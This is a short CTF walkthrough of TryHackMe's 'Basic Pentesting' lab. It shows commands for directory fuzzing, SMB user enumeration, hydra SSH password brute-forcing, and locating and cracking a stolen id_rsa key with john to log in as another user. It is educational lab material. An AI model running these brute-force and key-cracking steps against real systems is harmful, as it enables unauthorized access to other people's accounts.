[EN] Tryhackme Basic Pentesting Writeup
Hello everyone. Today I will show you the solution to the Basic Pentesting CTF.
Let’s Start.
Task 1: Web App Testing and Privilege Escalation
1.Deploy the machine and connect to our network
No answer needed
2.Find the services exposed by the machine
3.What is the name of the hidden directory on the web server ?
We will now do a directory search
ffuf -u http://MACHINE_IP/FUZZ -w /wordlist_path
gobuster dir -w /wordlist_path -u http://MACHINE_IP/
Yay We Found Hidden Directory and We go there.
4.User brute-forcing to find the username & password
No answer needed
5.What is the username?
We checking the pages.There were Conversations about SMB. And We saw that the SMB port is open in Nmap Output.
I think We will use “enum4linux”
enum4linux -a <MACHINE_IP>
We Found usernames !!!
6.What is the password?
We only know username and we think SSH therefore We will use “hydra”
hydra -l jan -P /wordlist_path <MACHINE_IP> ssh
Yes We Found password. Lets go inside
We are in !!!
7.What service do you use to access the server ?
SSH
8.Enumerate the machine to find any vectors for privilege escalation
No answer needed
9.What is the name of the other user you found ?
There are many solution method. You can go “/home/” directory and see it. Or you can read “/etc/passwd” and see it (True method in my opinion)
10.If you have found another user, what can you do with this information?
No answer needed
We can maybe check crontabs or find ssh key.
find / -name “*id_rsa*” 2>/dev/null
We take “id_rsa” and crack with john. But we must before hash with john.
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john — wordlist=/wordlist_path id_rsa.hash
Yay we Found !!!
ssh -i id_rsa kay@localhost (write in jan’s ssh)
Hokus Pokus !!!
11.What is the final password you obtain?
YAY CONGRATS !!!
This CTF was so fun. See you in new CTF’s.